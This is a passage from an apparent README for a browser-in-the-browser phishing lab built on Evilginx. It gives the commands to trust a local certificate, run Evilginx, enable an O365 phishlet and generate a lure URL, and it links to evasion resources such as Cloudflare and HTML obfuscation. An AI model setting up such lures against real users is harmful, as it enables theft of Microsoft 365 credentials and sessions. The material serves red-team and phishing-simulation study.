    On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

    Now RESTART your Browser

    You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

    Running Evilginx:

    At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

    Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

    sudo apt install tmux -y

    Start Evilginx in developer mode (using tmux to avoid losing the session):

    tmux new-session -s evilginx
    cd ~/evilginx/
    ./evilginx -developer

    (To re-attach to the tmux session use tmux attach-session -t evilginx)

    Evilginx Config:

    config domain fake.com
    config ipv4 127.0.0.1

    IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

    blacklist noadd

    Setup Phishlet and Lure:

    phishlets hostname O365 fake.com
    phishlets enable O365
    lures create O365
    lures get-url 0

    Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

    Useful Resources

    Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

    Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

    My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

    How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

    Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

    TODO

    • Create script(s) to automate most of the steps

